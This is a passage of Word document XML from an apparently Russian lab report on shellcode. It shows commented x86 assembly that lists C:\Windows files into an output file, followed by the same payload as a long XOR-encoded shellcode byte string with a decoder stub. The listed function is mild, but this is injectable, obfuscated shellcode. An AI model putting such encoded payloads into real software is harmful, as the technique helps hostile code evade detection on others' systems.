    <w:p w14:paraId="7B6D06E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esi, [ebp-0x18]   ; "C:\Windows\*"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D53B0E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ebx, ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5681679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0A483F2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Выделим место в стеке для WIN32_FIND_DATA структуры</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A887DC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sub esp, 0x200        ; ~ 592 bytes for WIN32_FIND_DATA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550F61F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[ebp-0x4c], esp   ; Save buffer address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F08933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65EC2E4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esp              ; lpFindFileData</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D46F0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esi              ; C:\Windows\*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3161DEC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7474070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[ebp-0x34]   ; FindFirstFileA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC47B4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call eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0875F79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79A9C94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cmp eax, -1           ; Check if INVALID_HANDLE_VALUE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A26E0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jz close_and_exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116A911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D99112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[ebp-0x50], eax   ; Save search handle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B755D5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21F554A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Обрабатываем первый найденный файл/директорию</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAAB38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process_file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6202C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Получаем имя файла из структуры WIN32_FIND_DATA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780EBE5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cFileName находится по смещению 44 (0x2C) от начала структуры</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42628F7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[ebp-0x4c]   ; Buffer address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7496D28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add eax, 44           ; Point to cFileName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E93D34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[ebp-0x54], eax   ; Save file/dir name address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC47AA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0654454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Записываем имя в файл</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4660B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WriteFile parameters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F558E6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hFile = [ebp-0x48]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F799AB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lpBuffer = file/dir name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781BFE4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nNumberOfBytesToWrite = длина строки (будем писать пока не встретим 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714DD04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lpNumberOfBytesWritten = временный буфер в стеке</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3B9B1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lpOverlapped = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351920B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21DDE13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Сначала вычислим длину строки</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AB887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edi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59888B7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esi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BEAA2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edi, [ebp-0x54]   ; имя файла</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDF1CA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ecx, ecx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E71AFD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dec ecx               ; ecx = FFFFFFFF для максимального поиска</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427244C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xor al, al            ; ищем 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BD410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cld</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B7A41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repne scasb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEDD62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not ecx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6E917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dec ecx               ; ecx = длина строки</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD14A4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[ebp-0x58], ecx   ; сохраняем длину</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB9848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pop esi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F6625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pop edi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6301A20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A42778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Добавляем перевод строки (CRLF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7136C40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Сначала запишем имя файла</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6606ADA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sub esp, 8            ; место для lpNumberOfBytesWritten</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DE688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[ebp-0x5c], esp   ; сохраняем указатель</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0715FD5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7B345FA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                ; lpOverlapped = NULL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C76F7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dword [ebp-0x5c] ; lpNumberOfBytesWritten</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6254D04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dword [ebp-0x58] ; nNumberOfBytesToWrite (длина имени)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E38EC4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dword [ebp-0x54] ; lpBuffer (имя файла)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7040598A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dword [ebp-0x48] ; hFile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7D07B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9E2452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[ebp-0x40]   ; WriteFile address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2013274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call eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C212D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16AE786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Теперь запишем CRLF (0x0D, 0x0A)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D8366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word [ebp-0x60], 0x0A0D  ; CRLF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D27F9F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sub esp, 8            ; место для lpNumberOfBytesWritten</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5046C71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[ebp-0x64], esp   ; сохраняем указатель</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B28B8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660DD2A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0                ; lpOverlapped = NULL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B64122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dword [ebp-0x64] ; lpNumberOfBytesWritten</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F142B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2                ; nNumberOfBytesToWrite (2 байта)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0154CCB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lea eax, [ebp-0x60]   ; lpBuffer (CRLF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFD15B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eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07517F0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dword [ebp-0x48] ; hFile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A98065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63010C3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[ebp-0x40]   ; WriteFile address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B0905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call eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9A8F6F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5E706FC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Ищем следующий файл</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74712BC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[ebp-0x50]   ; Search handle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46070C0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dword [ebp-0x4c] ; lpFindFileData</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C4E478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eax              ; hFindFile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2DA65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36C3776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[ebp-0x38]   ; FindNextFileA address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F4D63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call eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1DD8A3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6103CD2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test eax, eax         ; if (FALSE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9581B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jnz process_file      ; если есть еще файлы, продолжаем</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A93A1C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7564479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Закрываем handle поиска</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E80C92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[ebp-0x50]   ; Search handle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055EE314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eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0D2C9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[ebp-0x44]   ; CloseHandle address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BBED0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call eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08732DCD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</w:p>
    <w:p w14:paraId="6F842E6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close_and_exit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485B928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Закрываем выходной файл</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD1F46B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[ebp-0x48]   ; File handle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A10307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push eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FC28B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eax, [ebp-0x44]   ; CloseHandle address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307D2BD0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call eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F418B77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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B169C41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exit_loop:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BFB31C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; Восстанавливаем стек</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730ECA99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mov esp, ebp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E17126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pop ebp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74426DF5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 xml:space="preserve">  Ret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E884C2">
      <w:pPr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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5072917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5EC45DD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Листинг бинарного кода полезной нагрузки (в формате литералов)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B4ABA2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31922AE">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU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ru-RU"/>
        </w:rPr>
        <w:t>\x56\x50\x53\x89\xe3\x81\xeb\x35\xfd\xff\xff\x89\xe6\x83\xee\xf4\x83\xee\xe2\x80\x36\x03\x46\x39\xde\x75\xf8\x5b\x58\x5e\x56\x8a\xe6\x82\xef\x03\x02\x03\x03\x32\xd8\x50\x65\x6b\x66\x42\x6b\x77\x45\x6a\x6f\x6b\x45\x6a\x71\x70\x6b\x45\x6a\x6d\x67\x8a\x66\xff\x32\xd8\x50\x69\x42\x6b\x45\x6a\x6f\x66\x6b\x4d\x66\x7b\x77\x6b\x45\x6a\x6d\x67\x8a\x66\xfb\x32\xd8\x50\x6b\x6f\x66\x42\x03\x6b\x77\x66\x45\x6a\x6b\x40\x71\x66\x62\x8a\x66\xf7\x32\xd8\x50\x69\x66\x6b\x66\x45\x6a\x6f\x6b\x54\x71\x6a\x77\x8a\x66\xf3\x32\xd8\x50\x69\x66\x6b\x66\x45\x6a\x6f\x6b\x40\x6f\x6c\x70\x8a\x66\xef\x32\xd8\x50\x50\x50\x50\x6b\x74\x70\x5f\x29\x6b\x6a\x6d\x67\x6c\x6b\x40\x39\x5f\x54\x8a\x66\xeb\x32\xd8\x50\x50\x50\x50\x69\x77\x6b\x77\x2d\x77\x7b\x6b\x6d\x77\x66\x6d\x6b\x71\x5f\x60\x6c\x6b\x77\x5c\x67\x6a\x6b\x66\x60\x71\x66\x6b\x40\x39\x5f\x70\x8a\x66\xe7\x32\xc3\x32\xca\xb2\x33\x67\x88\x1a\x88\x58\x0f\x88\x58\x17\x88\x18\x88\x18\x88\x58\x13\x8a\x5e\xe3\x88\x50\x3f\x02\xd9\x88\x51\x7b\x02\xd9\x88\x49\x17\x8a\x4e\xdf\x88\x71\x1f\x02\xdd\x8a\x76\xdb\x88\x71\x23\x02\xdd\x8a\x76\xd7\x88\x71\x27\x02\xdd\x8a\x76\xd3\x32\xc3\x8a\xc9\x88\x7e\xd7\x88\x76\xff\x32\xca\xff\x88\x3f\x84\x02\xdc\x65\x80\xc2\x0d\xf0\xa5\x77\x06\x43\x3a\xd3\x71\xe6\x88\x4e\xd3\x88\x56\xdb\x65\x88\x07\x42\x88\x07\x81\x02\xdb\x8a\x46\xcf\x32\xc3\x88\x56\xdf\x88\x7e\xd7\x88\x76\xfb\x32\xca\xff\x88\x3f\x84\x02\xdc\x65\x80\xc2\x0e\xf0\xa5\x77\x06\x43\x3a\xd3\x71\xe6\x88\x4e\xd3\x88\x56\xdb\x65\x88\x07\x42\x88\x07\x81\x02\xdb\x8a\x46\xcb\x32\xc3\x88\x56\xdf\x88\x7e\xd7\x88\x76\xf7\x32\xca\xff\x88\x3f\x84\x02\xdc\x65\x80\xc2\x08\xf0\xa5\x77\x06\x43\x3a\xd3\x71\xe6\x88\x4e\xd3\x88\x56\xdb\x65\x88\x07\x42\x88\x07\x81\x02\xdb\x8a\x46\xc7\x32\xc3\x88\x56\xdf\x88\x7e\xd7\x88\x76\xf3\x32\xca\xff\x88\x3f\x84\x02\xdc\x65\x80\xc2\x0a\xf0\xa5\x77\x06\x43\x3a\xd3\x71\xe6\x88\x4e\xd3\x88\x56\xdb\x65\x88\x07\x42\x88\x07\x81\x02\xdb\x8a\x46\xc3\x32\xc3\x88\x56\xdf\x88\x7e\xd7\x88\x76\xef\x32\xca\xff\x88\x3f\x84\x02\xdc\x65\x80\xc2\x08\xf0\xa5\x77\x06\x43\x3a\xd3\x71\xe6\x88\x4e\xd3\x88\x56\xdb\x65\x88\x07\x42\x88\x07\x81\x02\xdb\x8a\x46\xbf\x69\x03\x6b\x83\x03\x03\x03\x69\x01\x69\x03\x69\x03\x6b\x03\x03\x03\x43\x88\x46\xe7\x53\x88\x46\xc7\xfc\xd3\x80\xfb\xfc\x0c\x87\x9b\x03\x03\x03\x8a\x46\xbb\x88\x76\xeb\x32\xd8\x82\xef\x03\x01\x03\x03\x8a\x66\xb7\x57\x55\x88\x46\xcf\xfc\xd3\x80\xfb\xfc\x77\x71\x8a\x46\xb3\x88\x46\xb7\x80\xc3\x2f\x8a\x46\xaf\x54\x55\x88\x7e\xaf\x32\xca\x4a\x33\xc3\xff\xf1\xad\xf4\xd2\x4a\x8a\x4e\xab\x5d\x5c\x80\xef\x0b\x8a\x66\xa7\x69\x03\xfc\x76\xa7\xfc\x76\xab\xfc\x76\xaf\xfc\x76\xbb\x88\x46\xc3\xfc\xd3\x65\xc4\x46\xa3\x0e\x09\x80\xef\x0b\x8a\x66\x9f\x69\x03\xfc\x76\x9f\x69\x01\x8e\x46\xa3\x53\xfc\x76\xbb\x88\x46\xc3\xfc\xd3\x88\x46\xb3\xfc\x76\xb7\x53\x88\x46\xcb\xfc\xd3\x86\xc3\x76\x99\x88\x46\xb3\x53\x88\x46\xbf\xfc\xd3\x88\x46\xbb\x53\x88\x46\xbf\xfc\xd3\x8a\xef\x5e\xc0</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1134" w:right="850" w:bottom="1134" w:left="113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3CA319"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="973CA319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EE2AB1"/>
    <w:rsid w:val="01A8449D"/>
    <w:rsid w:val="02BA1505"/>
    <w:rsid w:val="07C65BA2"/>
    <w:rsid w:val="08014B2C"/>
    <w:rsid w:val="0A705714"/>
    <w:rsid w:val="0AE26208"/>
    <w:rsid w:val="129A043E"/>
    <w:rsid w:val="12F552BB"/>
    <w:rsid w:val="16AF060B"/>
    <w:rsid w:val="16ED4BED"/>
    <w:rsid w:val="1C115047"/>
    <w:rsid w:val="1FCD3B53"/>
    <w:rsid w:val="2A115DAC"/>
    <w:rsid w:val="2FA40D5C"/>
    <w:rsid w:val="30EE2AB1"/>
    <w:rsid w:val="31740730"/>
    <w:rsid w:val="32E22F5B"/>
    <w:rsid w:val="37365481"/>
    <w:rsid w:val="3D217658"/>
    <w:rsid w:val="3F6C0E72"/>
    <w:rsid w:val="405565D3"/>
    <w:rsid w:val="41A825F0"/>
    <w:rsid w:val="43694CD3"/>
    <w:rsid w:val="44B62225"/>
    <w:rsid w:val="4BEE3859"/>
    <w:rsid w:val="4FAF29CD"/>
    <w:rsid w:val="575743A7"/>
    <w:rsid w:val="5AFA7DFA"/>
    <w:rsid w:val="5F261B1F"/>
    <w:rsid w:val="604E1BAA"/>
    <w:rsid w:val="63514926"/>
    <w:rsid w:val="63B22B70"/>
    <w:rsid w:val="64853504"/>
    <w:rsid w:val="6C5E4640"/>
    <w:rsid w:val="6CE01AA5"/>
    <w:rsid w:val="6E5A0455"/>
    <w:rsid w:val="70A86DA3"/>
    <w:rsid w:val="78182608"/>
    <w:rsid w:val="789E21A0"/>
    <w:rsid w:val="78AC6806"/>
    <w:rsid w:val="7BF11410"/>
    <w:rsid w:val="7CF96E58"/>
    <w:rsid w:val="7D872E30"/>
    <w:rsid w:val="7F35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0"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0"/>
      <w:ind w:left="720" w:firstLine="851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2026-03-15T20:07:00Z</dcterms:created>
  <dc:creator>WPS_1751377089</dc:creator>
  <cp:lastModifiedBy>WPS_1751377089</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-18T06:54:55Z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583465C57BCA41818E8C1AB525D3FDC3_11</vt:lpwstr>
  </property>
</Properties>
</file>